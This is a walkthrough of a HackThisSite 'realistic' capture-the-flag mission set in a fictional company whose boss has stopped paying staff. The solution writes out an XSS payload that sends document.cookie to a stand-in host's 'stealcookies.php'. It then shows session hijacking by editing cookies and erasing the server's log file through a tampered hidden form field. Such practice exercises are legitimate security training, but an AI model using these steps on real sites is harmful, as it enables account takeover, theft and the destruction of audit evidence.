• Level: Realistic::9 (CrappySoft Software)
• URL: http://www.hackthissite.org/missions/realistic/9/
• Difficulty :
• Exercise:

The boss over at CrappySoft has stopped paying his employees, and your friend is in need of money, fast. Help them get their salary paid. Message: Hey man, I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:

• Username: [email protected]
• Password: ilovemywork

Thanks man, good luck.

• Solution:

Connect as administrator

Click on "Private Message" from the menu and fill the form as follows, using following XSS:

javascript:void(window.location='http://domain.tld/stealcookies.php?'+document.cookie);

To simplify the attack, the site is directly providing us with the stollen information:

• [email protected]
• strPassword=94a35a3b7befff5eb2a8415af04aa16c
• intID=1

Use Firecookie in Firefox to change the values as follows:

When you paste the content of the username, take care to transform "%40" in "@".

Click on Pay salaries and then on the Pay button. You're done with this stage

Cover your tracks

Click on "Mailing list" link and edit source code. Notice that there is a hidden field named strFilename with value ./files/mailinglist/addresses.txt. If you look at this file, you will get the list of email addresses:

In addition, the mailing list form says that it deletes all references that do not contain "@", perfect to clear the log file. Also notice that directory listening is activated on files/ directory. We can find our log file:

Just replace the value in the hidden field with this:

./files/logs/logs.txt

Submit the form and you're done!

Comments

Talk:Hackthissite/Realistic/Level9